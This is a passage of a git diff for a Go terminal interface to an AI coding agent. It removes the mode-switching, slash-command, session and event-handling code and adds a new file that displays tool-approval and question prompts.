-		} else {
-			cacheStr = " | " + cachePercentStr
-		}
-	}
-
-	status := fmt.Sprintf(" %s | %s | %s%s%s", modeStr, modelName, cwd, contextStr, cacheStr)
-	if a.isThinking {
-		status += " | " + spinnerChars[a.spinnerIndex]
-	} else {
-		if a.toolOutputExpanded {
-			status += " | Tab:mode Esc:abort Ctrl+O:collapse"
-		} else {
-			status += " | Tab:mode Esc:abort Ctrl+O:expand"
-		}
-	}
-
-	return footerStyle.Width(a.width).Render(status)
-}
-
-func (a *App) addMessage(msg string) {
-	a.messages = append(a.messages, msg)
-	a.updateViewportContent()
-}
-
-// showNextApproval pops the next approval request from the queue and displays it.
-func (a *App) showNextApproval() {
-	if len(a.approvalQueue) == 0 {
-		a.waitingForApproval = false
-		a.pendingApprovalID = ""
-		return
-	}
-	next := a.approvalQueue[0]
-	a.approvalQueue = a.approvalQueue[1:]
-	a.pendingApprovalID = next.approvalID
-	a.waitingForApproval = true
-	if len(a.approvalQueue) > 0 {
-		a.addMessage(warningStyle.Render(fmt.Sprintf("⚠️  Approval required for [%s] (%d more pending)", next.toolName, len(a.approvalQueue))))
-	} else {
-		a.addMessage(warningStyle.Render(fmt.Sprintf("⚠️  Approval required for [%s]", next.toolName)))
-	}
-	if len(next.args) > 0 {
-		var buf strings.Builder
-		enc := json.NewEncoder(&buf)
-		enc.SetEscapeHTML(false)
-		enc.SetIndent("", "  ")
-		if err := enc.Encode(next.args); err == nil {
-			a.addMessage(warningStyle.Render(strings.TrimRight(buf.String(), "\n")))
-		}
+	available := height - used
+	if available < 1 {
+		return 1
 	}
-	a.addMessage(warningStyle.Render("Approve? (y/n): "))
+	return available
 }
 
-func (a *App) cycleMode() {
-	modes := []string{"plan", "agent", "yolo"}
-	current := 0
-	for i, m := range modes {
-		if m == a.mode {
-			current = i
-			break
-		}
-	}
-	next := (current + 1) % len(modes)
-	a.mode = modes[next]
-
-	// If agent is currently running, abort it so the new mode takes effect immediately
-	if a.isThinking && a.agent != nil {
-		a.agent.Abort()
-		a.agent = nil
-		a.inputQueueMu.Lock()
-		a.inputQueue = a.inputQueue[:0]
-		a.lastInputTime = time.Time{}
-		a.inputQueueMu.Unlock()
-		a.isThinking = false
-		a.addMessage(statusStyle.Render("⏹ Aborted (mode change)"))
-	} else {
-		a.agent = nil
+func (a *App) clampedLiveContent(footer string) string {
+	maxLines := a.liveContentHeight(footer)
+	if maxLines <= 0 {
+		return a.liveContent
 	}
-
-	var modeLabel string
-	switch a.mode {
-	case "plan":
-		modeLabel = "🗒️ PLAN - Read-only (no modifications)"
-	case "agent":
-		modeLabel = "🔧 AGENT - Bash requires approval"
-	case "yolo":
-		modeLabel = "🚀 YOLO - Full access"
+	lines := strings.Split(strings.TrimRight(a.liveContent, "\n"), "\n")
+	if len(lines) <= maxLines {
+		return a.liveContent
 	}
-	a.addMessage(statusStyle.Render(fmt.Sprintf("Mode: %s", modeLabel)))
+	return strings.Join(lines[len(lines)-maxLines:], "\n")
 }
 
-func (a *App) processInput(input string) tea.Cmd {
-	if strings.HasPrefix(input, "/") {
-		return a.handleCommand(input)
+func (a *App) markAssistantRenderedDirty() {
+	if a.assistantDirty == nil {
+		a.assistantDirty = make(map[int]bool)
 	}
-
-	if a.agent == nil {
-		compactionSettings := ctxpkg.CompactionSettings{
-			Enabled:          a.settings.Compaction.Enabled,
-			ReserveTokens:    a.settings.Compaction.ReserveTokens,
-			KeepRecentTokens: a.settings.Compaction.KeepRecentTokens,
-		}
-		if compactionSettings.ReserveTokens == 0 {
-			compactionSettings.ReserveTokens = 16384
-		}
-		if compactionSettings.KeepRecentTokens == 0 {
-			compactionSettings.KeepRecentTokens = 20000
-		}
-
-		agentCfg := agent.Config{
-			Provider:           a.provider,
-			Model:              a.model,
-			Mode:               a.mode,
-			ThinkingLevel:      provider.ThinkingLevel(a.settings.DefaultThinkingLevel),
-			MaxTokens:          a.settings.MaxOutputTokens,
-			Settings:           a.settings,
-			Session:            a.session,
-			ExtraContext:       a.extraContext,
-			CompactionSettings: compactionSettings,
-		}
-		a.agent = agent.New(agentCfg, a.registry)
-
-		// Load history messages from session if available and not yet loaded
-		a.sessionMu.Lock()
-		historyLoaded := a.historyLoaded
-		a.sessionMu.Unlock()
-		if a.session != nil && !historyLoaded {
-			a.sessionMu.Lock()
-			historyMessages := a.session.GetMessages()
-			a.sessionMu.Unlock()
-
-			if len(historyMessages) > 0 {
-				a.agent.LoadHistoryMessages(historyMessages)
-			}
-		}
+	for idx := range a.assistantRendered {
+		a.assistantDirty[idx] = true
 	}
-
-	ctx := context.Background()
-	a.eventCh = a.agent.Run(ctx, input)
-
-	return tea.Batch(
-		func() tea.Msg { return agentStartMsg{input: input} },
-		listenEvents(a.eventCh),
-	)
-}
-
-func (a *App) handleCommand(cmd string) tea.Cmd {
-	parts := strings.Fields(cmd)
-	command := parts[0]
-
-	switch command {
-	case "/mode":
-		if len(parts) > 1 {
-			switch parts[1] {
-			case "plan", "agent", "yolo":
-				a.mode = parts[1]
-				// If agent is currently running, abort it so the new mode takes effect immediately
-				if a.isThinking && a.agent != nil {
-					a.agent.Abort()
-					a.agent = nil
-					a.inputQueueMu.Lock()
-					a.inputQueue = a.inputQueue[:0]
-					a.lastInputTime = time.Time{}
-					a.inputQueueMu.Unlock()
-					a.isThinking = false
-					a.addMessage(statusStyle.Render("⏹ Aborted (mode change)"))
-				} else {
-					a.agent = nil
-				}
-				a.addMessage(statusStyle.Render(fmt.Sprintf("Mode: %s", strings.ToUpper(a.mode))))
-			default:
-				a.addMessage(errorStyle.Render("Invalid mode"))
-			}
-		} else {
-			a.addMessage(statusStyle.Render(fmt.Sprintf("Current mode: %s", strings.ToUpper(a.mode))))
-			switch a.mode {
-			case "plan":
-				a.addMessage(statusStyle.Render("  Permissions: READ only (no modifications)"))
-			case "agent":
-				a.addMessage(statusStyle.Render("  Permissions: READ/WRITE/EDIT auto | BASH requires approval"))
-			case "yolo":
-				a.addMessage(statusStyle.Render("  Permissions: ALL tools auto-execute"))
-			}
-		}
-	case "/model":
-		if len(parts) > 1 {
-			// Switch model
-			modelID := parts[1]
-			newModel := a.provider.GetModel(modelID)
-			if newModel == nil {
-				a.addMessage(errorStyle.Render(fmt.Sprintf("Model not found: %s", modelID)))
-				// List available models
-				models := a.provider.Models()
-				if len(models) > 0 {
-					var sb strings.Builder
-					sb.WriteString("Available models:\n")
-					for _, m := range models {
-						marker := " "
-						if m.ID == a.model.ID {
-							marker = "*"
-						}
-						sb.WriteString(fmt.Sprintf("  [%s] %s (%s)\n", marker, m.Name, m.ID))
-					}
-					a.addMessage(statusStyle.Render(sb.String()))
-				}
-				return nil
-			}
-			a.model = newModel
-			// Reset agent so next message uses the new model
-			a.agent = nil
-			a.addMessage(statusStyle.Render(fmt.Sprintf("✅ Model switched to: %s (%s)", newModel.Name, newModel.ID)))
-		} else {
-			// Show current model and available models
-			a.addMessage(statusStyle.Render(fmt.Sprintf("Current model: %s (%s)", a.model.Name, a.model.ID)))
-			models := a.provider.Models()
-			if len(models) > 0 {
-				var sb strings.Builder
-				sb.WriteString("Available models (use /model <id> to switch):\n")
-				for _, m := range models {
-					marker := " "
-					if m.ID == a.model.ID {
-						marker = "*"
-					}
-					sb.WriteString(fmt.Sprintf("  [%s] %s (%s)\n", marker, m.Name, m.ID))
-				}
-				a.addMessage(statusStyle.Render(sb.String()))
-			}
-		}
-	case "/skills":
-		a.listSkills()
-	case "/skill":
-		if len(parts) > 1 {
-			a.activateSkill(parts[1])
-		} else {
-			a.listSkills()
-		}
-	case "/clear":
-		a.messages = nil
-		a.agent = nil
-		a.contextUsage = nil
-		a.totalInputTokens = 0
-		a.totalCacheRead = 0
-		a.totalCacheWrite = 0
-		a.pastes = make(map[int]string)
-		a.pasteCounter = 0
-		a.activeSkills = make(map[string]string)
-		a.extraContext = a.baseExtraContext
-		a.updateViewportContent()
-	case "/quit":
-		return tea.Quit
-	case "/sessions":
-		a.handleSessionsCommand(parts)
-	case "/help":
-		a.addMessage(statusStyle.Render("Commands:"))
-		a.addMessage(statusStyle.Render("  /mode [plan|agent|yolo] - Switch or show mode"))
-		a.addMessage(statusStyle.Render("  /model [model_id]       - Switch or show model"))
-		a.addMessage(statusStyle.Render("  /skills                 - List available skills"))
-		a.addMessage(statusStyle.Render("  /skill <name>           - Activate a skill"))
-		a.addMessage(statusStyle.Render("  /clear                  - Clear conversation"))
-		a.addMessage(statusStyle.Render("  /sessions               - List sessions for this project"))
-		a.addMessage(statusStyle.Render("  /sessions ls            - List sessions"))
-		a.addMessage(statusStyle.Render("  /sessions set <id>      - Switch to session"))
-		a.addMessage(statusStyle.Render("  /sessions clear         - Create a new session"))
-		a.addMessage(statusStyle.Render("  /sessions del <id>      - Delete a session"))
-		a.addMessage(statusStyle.Render("  /quit                   - Exit"))
-		a.addMessage(statusStyle.Render("  /help                   - Show this help"))
-		a.addMessage(statusStyle.Render(""))
-		a.addMessage(statusStyle.Render("Keyboard shortcuts:"))
-		a.addMessage(statusStyle.Render("  Tab       - Cycle mode (plan/agent/yolo)"))
-		a.addMessage(statusStyle.Render("  Esc       - Abort current operation"))
-		a.addMessage(statusStyle.Render("  Ctrl+O    - Toggle tool output"))
-		a.addMessage(statusStyle.Render("  PgUp/PgDn - Scroll viewport"))
-	default:
-		// Handle /skill:<name> syntax (colon-separated)
-		if strings.HasPrefix(command, "/skill:") {
-			skillName := strings.TrimPrefix(command, "/skill:")
-			if skillName != "" {
-				a.activateSkill(skillName)
-			} else {
-				a.listSkills()
-			}
-		} else {
-			a.addMessage(errorStyle.Render(fmt.Sprintf("Unknown: %s", command)))
-		}
-	}
-
-	return nil
-}
-
-// listSkills displays all available skills.
-func (a *App) listSkills() {
-	if a.skillsMgr == nil {
-		a.addMessage(statusStyle.Render("No skills manager available."))
-		return
-	}
-	skillList := a.skillsMgr.List()
-	if len(skillList) == 0 {
-		a.addMessage(statusStyle.Render("No skills found."))
-		return
-	}
-
-	var sb strings.Builder
-	sb.WriteString("Available skills:\n")
-	for _, s := range skillList {
-		marker := " "
-		if _, ok := a.activeSkills[s.Name]; ok {
-			marker = "*"
-		}
-		sb.WriteString(fmt.Sprintf("  [%s] %s (%s): %s\n", marker, s.Name, s.Source, s.Description))
-	}
-	sb.WriteString("\nUse /skill <name> or /skill:<name> to activate a skill.")
-	a.addMessage(statusStyle.Render(sb.String()))
-}
-
-// activateSkill loads a skill's content into the extra context.
-func (a *App) activateSkill(name string) {
-	if a.skillsMgr == nil {
-		a.addMessage(errorStyle.Render("No skills manager available."))
-		return
-	}
-	skill := a.skillsMgr.Get(name)
-	if skill == nil {
-		a.addMessage(errorStyle.Render(fmt.Sprintf("Skill not found: %s", name)))
-		return
-	}
-
-	// Check if already active
-	if _, ok := a.activeSkills[name]; ok {
-		a.addMessage(statusStyle.Render(fmt.Sprintf("Skill '%s' is already active.", name)))
-		return
-	}
-
-	// Add skill content to active skills
-	skillCtx := a.skillsMgr.BuildSkillContext(name)
-	a.activeSkills[name] = skillCtx
-
-	// Rebuild extraContext from base + all active skills
-	a.rebuildExtraContext()
-
-	// Reset agent so next message uses the updated context
-	a.agent = nil
-
-	a.addMessage(statusStyle.Render(fmt.Sprintf("✅ Skill '%s' activated (%s): %s", name, skill.Source, skill.Description)))
-}
-
-// rebuildExtraContext rebuilds extraContext from base context + all active skills.
-func (a *App) rebuildExtraContext() {
-	sb := strings.Builder{}
-	sb.WriteString(a.baseExtraContext)
-	for _, ctx := range a.activeSkills {
-		sb.WriteString(ctx)
-	}
-	a.extraContext = sb.String()
-}
-
-// getSessionDir returns the session directory path.
-func (a *App) getSessionDir() string {
-	if a.settings != nil {
-		return a.settings.GetSessionDir()
-	}
-	home, _ := os.UserHomeDir()
-	if home == "" {
-		home = "."
-	}
-	return filepath.Join(home, ".vibecoding", "sessions")
-}
-
-// getCurrentSessionID returns the current session's short ID (first 8 chars).
-func (a *App) getCurrentSessionID() string {
-	if a.session == nil {
-		return ""
-	}
-	file := a.session.GetFile()
-	if file == "" {
-		return ""
-	}
-	base := filepath.Base(file)
-	base = strings.TrimSuffix(base, ".jsonl")
-	if idx := strings.Index(base, "_"); idx >= 0 {
-		return base[idx+1:]
-	}
-	return ""
-}
-
-// handleSessionsCommand handles the /sessions command and its subcommands.
-func (a *App) handleSessionsCommand(parts []string) {
-	sub := "ls"
-	if len(parts) > 1 {
-		sub = strings.ToLower(parts[1])
-	}
-
-	switch sub {
-	case "ls", "list":
-		a.sessionsList()
-	case "set", "switch", "use":
-		if len(parts) < 3 {
-			a.addMessage(errorStyle.Render("Usage: /sessions set <id>"))
-			return
-		}
-		a.sessionsSet(parts[2])
-	case "clear", "new":
-		a.sessionsClear()
-	case "del", "delete", "rm":
-		if len(parts) < 3 {
-			a.addMessage(errorStyle.Render("Usage: /sessions del <id>"))
-			return
-		}
-		a.sessionsDel(parts[2])
-	default:
-		a.addMessage(errorStyle.Render(fmt.Sprintf("Unknown subcommand: %s. Use ls, set, clear, del.", sub)))
-	}
-}
-
-// sessionsList lists all sessions for the current project directory.
-func (a *App) sessionsList() {
-	cwd := ""
-	if a.session != nil && a.session.GetHeader() != nil {
-		cwd = a.session.GetHeader().Cwd
-	}
-	if cwd == "" {
-		if w, err := os.Getwd(); err == nil {
-			cwd = w
-		}
-	}
-
-	sessionDir := a.getSessionDir()
-	details, err := session.ListForDirDetailed(cwd, sessionDir)
-	if err != nil {
-		a.addMessage(errorStyle.Render(fmt.Sprintf("Error listing sessions: %v", err)))
-		return
-	}
-
-	if len(details) == 0 {
-		a.addMessage(statusStyle.Render("No sessions found for this project."))
-		return
-	}
-
-	currentID := a.getCurrentSessionID()
-
-	var sb strings.Builder
-	sb.WriteString("Sessions for this project:\n\n")
-	for _, d := range details {
-		marker := " "
-		if d.ID == currentID {
-			marker = "*"
-		}
-		age := formatAge(d.ModTime)
-		preview := ""
-		if d.Preview != "" {
-			preview = " - " + d.Preview
-		}
-		sb.WriteString(fmt.Sprintf("  [%s] %s  %d msgs  %s%s\n",
-			marker, d.ID, d.MessageCount, age, preview))
-	}
-	sb.WriteString("\nUse /sessions set <id> to switch. * = current session.")
-	a.addMessage(statusStyle.Render(sb.String()))
-}
-
-// sessionsSet switches to a different session by ID prefix.
-func (a *App) sessionsSet(id string) {
-	cwd := ""
-	if a.session != nil && a.session.GetHeader() != nil {
-		cwd = a.session.GetHeader().Cwd
-	}
-	if cwd == "" {
-		if w, err := os.Getwd(); err == nil {
-			cwd = w
-		}
-	}
-
-	// Don't switch to the same session
-	if id == a.getCurrentSessionID() {
-		a.addMessage(statusStyle.Render("Already on this session."))
-		return
-	}
-
-	sessionDir := a.getSessionDir()
-	details, err := session.ListForDirDetailed(cwd, sessionDir)
-	if err != nil {
-		a.addMessage(errorStyle.Render(fmt.Sprintf("Error: %v", err)))
-		return
-	}
-
-	// Find matching session by ID prefix
-	var match *session.SessionDetail
-	for i, d := range details {
-		if strings.HasPrefix(d.ID, id) {
-			if match != nil {
-				a.addMessage(errorStyle.Render(fmt.Sprintf("Ambiguous ID '%s'. Be more specific.", id)))
-				return
-			}
-			match = &details[i]
-		}
-	}
-
-	if match == nil {
-		a.addMessage(errorStyle.Render(fmt.Sprintf("No session found matching '%s'.", id)))
-		return
-	}
-
-	// Open the session
-	newSess, err := session.Open(match.Path)
-	if err != nil {
-		a.addMessage(errorStyle.Render(fmt.Sprintf("Error opening session: %v", err)))
-		return
-	}
-
-	// Switch session
-	a.session = newSess
-	a.historyLoaded = false
-
-	// Reset agent and UI state
-	a.agent = nil
-	a.messages = nil
-	a.toolResults = nil
-	a.contextUsage = nil
-	a.totalInputTokens = 0
-	a.totalCacheRead = 0
-	a.totalCacheWrite = 0
-	a.assistantRaw = make(map[int]string)
-	a.assistantRendered = make(map[int]string)
-	a.assistantDirty = make(map[int]bool)
-	a.currentAssistantIdx = -1
-	a.currentThinkIdx = -1
-
-	// Load history messages from the new session
-	a.LoadHistoryMessages()
-	a.updateViewportContent()
-
-	a.addMessage(statusStyle.Render(fmt.Sprintf("✅ Switched to session %s (%d msgs)",
-		match.ID, match.MessageCount)))
-}
-
-// sessionsClear creates a new session, starting fresh.
-func (a *App) sessionsClear() {
-	cwd := ""
-	if a.session != nil && a.session.GetHeader() != nil {
-		cwd = a.session.GetHeader().Cwd
-	}
-	if cwd == "" {
-		if w, err := os.Getwd(); err == nil {
-			cwd = w
-		}
-	}
-
-	sessionDir := a.getSessionDir()
-	newSess := session.New(cwd, sessionDir)
-	if err := newSess.Init(); err != nil {
-		a.addMessage(errorStyle.Render(fmt.Sprintf("Error creating session: %v", err)))
-		return
-	}
-
-	a.session = newSess
-	a.historyLoaded = false
-
-	// Reset agent and UI state
-	a.agent = nil
-	a.messages = nil
-	a.toolResults = nil
-	a.contextUsage = nil
-	a.totalInputTokens = 0
-	a.totalCacheRead = 0
-	a.totalCacheWrite = 0
-	a.assistantRaw = make(map[int]string)
-	a.assistantRendered = make(map[int]string)
-	a.assistantDirty = make(map[int]bool)
-	a.currentAssistantIdx = -1
-	a.currentThinkIdx = -1
-	a.updateViewportContent()
-
-	a.addMessage(statusStyle.Render("✅ New session created."))
-}
-
-// sessionsDel deletes a session by ID prefix.
-func (a *App) sessionsDel(id string) {
-	cwd := ""
-	if a.session != nil && a.session.GetHeader() != nil {
-		cwd = a.session.GetHeader().Cwd
-	}
-	if cwd == "" {
-		if w, err := os.Getwd(); err == nil {
-			cwd = w
-		}
-	}
-
-	// Don't delete the current session
-	if id == a.getCurrentSessionID() {
-		a.addMessage(errorStyle.Render("Cannot delete the current session. Switch to another session first, or use /sessions clear to start fresh."))
-		return
-	}
-
-	sessionDir := a.getSessionDir()
-	details, err := session.ListForDirDetailed(cwd, sessionDir)
-	if err != nil {
-		a.addMessage(errorStyle.Render(fmt.Sprintf("Error: %v", err)))
-		return
-	}
-
-	// Find matching session by ID prefix
-	var match *session.SessionDetail
-	for i, d := range details {
-		if strings.HasPrefix(d.ID, id) {
-			if match != nil {
-				a.addMessage(errorStyle.Render(fmt.Sprintf("Ambiguous ID '%s'. Be more specific.", id)))
-				return
-			}
-			match = &details[i]
-		}
-	}
-
-	if match == nil {
-		a.addMessage(errorStyle.Render(fmt.Sprintf("No session found matching '%s'.", id)))
-		return
-	}
-
-	if err := session.DeleteSession(match.Path); err != nil {
-		a.addMessage(errorStyle.Render(fmt.Sprintf("Error deleting session: %v", err)))
-		return
-	}
-
-	a.addMessage(statusStyle.Render(fmt.Sprintf("✅ Deleted session %s.", match.ID)))
-}
-
-// formatAge returns a human-readable age string for a time.
-func formatAge(t time.Time) string {
-	d := time.Since(t)
-	switch {
-	case d < time.Minute:
-		return "just now"
-	case d < time.Hour:
-		mins := int(d.Minutes())
-		if mins == 1 {
-			return "1 min ago"
-		}
-		return fmt.Sprintf("%d mins ago", mins)
-	case d < 24*time.Hour:
-		hours := int(d.Hours())
-		if hours == 1 {
-			return "1 hour ago"
-		}
-		return fmt.Sprintf("%d hours ago", hours)
-	case d < 30*24*time.Hour:
-		days := int(d.Hours() / 24)
-		if days == 1 {
-			return "1 day ago"
-		}
-		return fmt.Sprintf("%d days ago", days)
-	default:
-		return t.Format("2006-01-02")
-	}
-}
-
-func (a *App) handleAgentEvent(event agent.Event) tea.Cmd {
-	switch event.Type {
-	case agent.EventTextDelta:
-		if a.currentAssistantIdx >= 0 && a.currentAssistantIdx < len(a.messages) {
-			a.assistantRaw[a.currentAssistantIdx] += event.TextDelta
-		} else {
-			a.currentAssistantIdx = len(a.messages)
-			a.assistantRaw[a.currentAssistantIdx] = event.TextDelta
-			// placeholder; actual display is built in updateViewportContent
-			a.messages = append(a.messages, "")
-		}
-		a.assistantDirty[a.currentAssistantIdx] = true
-		a.scheduleRender()
-		return listenEvents(a.eventCh)
-
-	case agent.EventThinkDelta:
-		if a.currentThinkIdx >= 0 && a.currentThinkIdx < len(a.messages) {
-			a.messages[a.currentThinkIdx] += event.ThinkDelta
-		} else {
-			a.currentThinkIdx = len(a.messages)
-			a.messages = append(a.messages, thinkStyle.Render("think: ")+event.ThinkDelta)
-		}
-		a.scheduleRender()
-		return listenEvents(a.eventCh)
-
-	case agent.EventTurnStart:
-		// Reserve display slots before streaming deltas arrive so later tool output
-		// cannot shift the assistant message index underneath us.
-		a.currentAssistantIdx = len(a.messages)
-		a.assistantRaw[a.currentAssistantIdx] = ""
-		a.messages = append(a.messages, "")
-		return listenEvents(a.eventCh)
-
-	case agent.EventToolCall:
-		if event.ToolCall != nil {
-			// Store tool args for later display
-			msgIdx := len(a.messages) // Will be the index after append
-			a.toolResults = append(a.toolResults, toolResult{
-				toolCallID: event.ToolCall.ID,
-				toolName:   event.ToolCall.Name,
-				toolArgs:   event.ToolArgs,
-				msgIndex:   msgIdx,
-			})
-			a.addMessage(toolStyle.Render(fmt.Sprintf("🔧 [%s] ...", event.ToolCall.Name)))
-		}
-		return listenEvents(a.eventCh)
-
-	case agent.EventToolResult:
-		// Find the matching tool result entry and update it
-		foundIdx := -1
-		for j := len(a.toolResults) - 1; j >= 0; j-- {
-			if a.toolResults[j].toolCallID == event.ToolCallID {
-				foundIdx = j
-				a.toolResults[j].fullContent = event.ToolResult
-
-				// Create summary based on tool type
-				switch event.ToolName {
-				case "bash":
-					a.toolResults[j].summary = event.ToolResult
-				case "read":
-					lines := strings.Split(event.ToolResult, "\n")
-					a.toolResults[j].summary = fmt.Sprintf("%d lines", len(lines))
-				case "write":
-					a.toolResults[j].summary = "Written"
-				case "edit":
-					a.toolResults[j].summary = "Applied"
-				default:
-					a.toolResults[j].summary = truncate(event.ToolResult, 50)
-				}
-				break
-			}
-		}
-
-		// Update the message at the stored index
-		if foundIdx >= 0 {
-			idx := a.toolResults[foundIdx].msgIndex
-			if idx >= 0 && idx < len(a.messages) {
-				if event.ToolName == "bash" || a.toolOutputExpanded {
-					a.messages[idx] = toolStyle.Render(fmt.Sprintf("🔧 [%s]\n%s", event.ToolName, event.ToolResult))
-				} else {
-					a.messages[idx] = toolStyle.Render(fmt.Sprintf("🔧 [%s] %s", event.ToolName, a.toolResults[foundIdx].summary))
-				}
-			}
-		}
-		a.scheduleRender()
-		return listenEvents(a.eventCh)
-
-	case agent.EventToolApprovalRequest:
-		// Queue the approval request
-		a.approvalQueue = append(a.approvalQueue, pendingApproval{
-			approvalID: event.ApprovalID,
-			toolName:   event.ApprovalTool,
-			args:       event.ApprovalArgs,
-		})
-		// If not currently waiting, show the next one
-		if !a.waitingForApproval {
-			a.showNextApproval()
-		}
-		a.scheduleRender()
-		return listenEvents(a.eventCh)
-
-	case agent.EventTurnEnd:
-		if event.ContextUsage != nil {
-			a.contextUsage = event.ContextUsage
-		}
-		a.currentAssistantIdx = -1
-		a.currentThinkIdx = -1
-		return listenEvents(a.eventCh)
-
-	case agent.EventDone:
-		a.isThinking = false
-		a.autoScroll = true
-		if event.ContextUsage != nil {
-			a.contextUsage = event.ContextUsage
-		}
-		a.currentAssistantIdx = -1
-		a.currentThinkIdx = -1
-		return listenEvents(a.eventCh)
-
-	case agent.EventError:
-		a.isThinking = false
-		if event.Error != nil {
-			a.addMessage(errorStyle.Render("Error: ") + event.Error.Error())
-		}
-		a.currentAssistantIdx = -1
-		a.currentThinkIdx = -1
-		return listenEvents(a.eventCh)
-
-	case agent.EventUsage:
-		if event.ContextUsage != nil {
-			a.contextUsage = event.ContextUsage
-		}
-		if event.Usage != nil {
-			// Accumulate cache stats
-			a.totalInputTokens += event.Usage.TotalInputTokens()
-			a.totalCacheRead += event.Usage.CacheRead
-			a.totalCacheWrite += event.Usage.CacheWrite
-
-			// Per-turn cache info
-			cacheInfo := ""
-			if info := event.Usage.CacheInfo(); info != "" {
-				cacheInfo = " | " + info
-			}
-			costStr := fmt.Sprintf("Tokens: %d↓/%d↑ $%.4f%s",
-				event.Usage.TotalInputTokens(), event.Usage.Output, event.Usage.Cost.Total, cacheInfo)
-			a.addMessage(statusStyle.Render(costStr))
-		}
-		a.scheduleRender()
-		return listenEvents(a.eventCh)
-
-	case agent.EventCompactionStart:
-		a.addMessage(statusStyle.Render("⏳ Compacting context..."))
-		return listenEvents(a.eventCh)
-
-	case agent.EventCompactionEnd:
-		if event.Error != nil {
-			a.addMessage(errorStyle.Render("Compaction failed: ") + event.Error.Error())
-		} else if event.StatusMessage != "" {
-			a.addMessage(statusStyle.Render("✅ " + event.StatusMessage))
-		} else {
-			a.addMessage(statusStyle.Render("✅ Context compacted"))
-		}
-		return listenEvents(a.eventCh)
-
-	default:
-		return listenEvents(a.eventCh)
-	}
-}
-
-func truncate(s string, maxLen int) string {
-	if len(s) <= maxLen {
-		return s
-	}
-	return s[:maxLen] + "..."
 }
 
 // Message types
 type agentStartMsg struct{ input string }
-type agentEventMsg struct{ event agent.Event }
-type agentDoneMsg struct{ err error }
 type renderRequestMsg struct{}
-
-func listenEvents(eventCh <-chan agent.Event) tea.Cmd {
-	return func() tea.Msg {
-		event, ok := <-eventCh
-		if !ok {
-			return agentDoneMsg{}
-		}
-		return agentEventMsg{event: event}
-	}
-}
diff --git a/internal/tui/approval.go b/internal/tui/approval.go
new file mode 100644
index 0000000..b52aac5
--- /dev/null
+++ b/internal/tui/approval.go
@@ -0,0 +1,134 @@
+package tui
+
+import (
+	"encoding/json"
+	"fmt"
+	"strings"
+
+	"github.com/startvibecoding/vibecoding/internal/tools"
+)
+
+// showNextApproval pops the next approval request from the queue and displays it.
+func (a *App) showNextApproval() {
+	if len(a.approvalQueue) == 0 {
+		a.waitingForApproval = false
+		a.pendingApprovalID = ""
+		return
+	}
+	next := a.approvalQueue[0]
+	a.approvalQueue = a.approvalQueue[1:]
+	a.pendingApprovalID = next.approvalID
+	a.waitingForApproval = true
+
+	// Build all lines into one message to preserve order.
+	var sb strings.Builder
+	if len(a.approvalQueue) > 0 {
+		sb.WriteString(warningStyle.Render(fmt.Sprintf("⚠️  Approval required for [%s] (%d more pending)", next.toolName, len(a.approvalQueue))))
+	} else {
+		sb.WriteString(warningStyle.Render(fmt.Sprintf("⚠️  Approval required for [%s]", next.toolName)))
+	}
+	sb.WriteByte('\n')
+	if len(next.args) > 0 {
+		sb.WriteString(warningStyle.Render(formatApprovalArgs(next.toolName, next.args)))
+		sb.WriteByte('\n')
+	}
+	sb.WriteString(warningStyle.Render("Approve? (y/n): "))
+	a.addMessage(sb.String())
+}
+
+func (a *App) clearApprovalState() {
+	a.waitingForApproval = false
+	a.pendingApprovalID = ""
+	a.approvalQueue = a.approvalQueue[:0]
+}
+
+// showNextQuestion pops the next question request from the queue and displays it.
+func (a *App) showNextQuestion() {
+	if len(a.questionQueue) == 0 {
+		a.waitingForQuestion = false
+		a.pendingQuestionID = ""
+		return
+	}
+	next := a.questionQueue[0]
+	a.questionQueue = a.questionQueue[1:]
+	a.pendingQuestionID = next.questionID
+	a.waitingForQuestion = true
+
+	// Build all lines into one message to preserve order (addMessage uses
+	// async goroutines, so multiple calls can interleave).
+	var sb strings.Builder
+	if next.context != "" {
+		sb.WriteString(warningStyle.Render("💬 " + next.context))
+		sb.WriteByte('\n')
+	}
+	sb.WriteString(warningStyle.Render("❓ " + next.question))
+	sb.WriteByte('\n')
+	for i, opt := range next.options {
+		sb.WriteString(statusStyle.Render(fmt.Sprintf("  [%d] %s", i+1, opt)))
+		sb.WriteByte('\n')
+	}
+	sb.WriteString(statusStyle.Render(fmt.Sprintf("  [%d] ✍️  Custom input", len(next.options)+1)))
+	sb.WriteByte('\n')
+	sb.WriteString(warningStyle.Render("Enter number or custom text: "))
+	a.addMessage(sb.String())
+}
+
+func (a *App) clearQuestionState() {
+	a.waitingForQuestion = false
+	a.pendingQuestionID = ""
+	a.questionQueue = a.questionQueue[:0]
+}
+
+func formatApprovalArgs(toolName string, args map[string]any) string {
+	if toolName == "edit" {
+		return formatEditApprovalArgs(args)
+	}
+
+	safeArgs := make(map[string]any, len(args))
+	for k, v := range args {
+		if k == "content" {
+			text := fmt.Sprintf("%v", v)
+			safeArgs[k] = fmt.Sprintf("(%d bytes)", len(text))
+			continue
+		}
+		safeArgs[k] = v
+	}
+	var buf strings.Builder
+	enc := json.NewEncoder(&buf)
+	enc.SetEscapeHTML(false)
+	enc.SetIndent("", "  ")
+	if err := enc.Encode(safeArgs); err != nil {
+		return fmt.Sprintf("%v", safeArgs)
+	}
+	return strings.TrimRight(buf.String(), "\n")
+}
+
+func formatEditApprovalArgs(args map[string]any) string {
+	path, _ := args["path"].(string)
+	if path == "" {
+		path = "<unknown path>"
+	}
+
+	var diffs []string
+	editList, ok := args["edits"].([]any)
+	if ok {
+		for _, e := range editList {
+			editMap, ok := e.(map[string]any)
+			if !ok {
+				continue
+			}
+			oldText, _ := editMap["oldText"].(string)
+			newText, _ := editMap["newText"].(string)
+			diff := tools.BuildFileDiff(path, oldText, newText)
+			if diff == nil || strings.TrimSpace(diff.Unified) == "" {
+				continue
+			}
+			diffs = append(diffs, strings.TrimRight(diff.Unified, "\n"))
+		}
+	}
+
+	if len(diffs) == 0 {
+		return fmt.Sprintf("path: %s\ndiff: (empty)", path)
+	}
+	return fmt.Sprintf("path: %s\n%s", path, strings.Join(diffs, "\n"))
+}
diff --git a/internal/tui/cache_test.go b/internal/tui/cache_test.go
index eb26305..847664d 100644
--- a/internal/tui/cache_test.go
+++ b/internal/tui/cache_test.go
@@ -1,14 +1,21 @@
 package tui
 
 import (
+	"context"
+	"os"
+	"path/filepath"
 	"regexp"
 	"strings"
 	"testing"
 	"time"
 
 	tea "github.com/charmbracelet/bubbletea"
+	"github.com/charmbracelet/lipgloss"
 	"github.com/startvibecoding/vibecoding/internal/agent"
+	"github.com/startvibecoding/vibecoding/internal/config"
 	"github.com/startvibecoding/vibecoding/internal/provider"
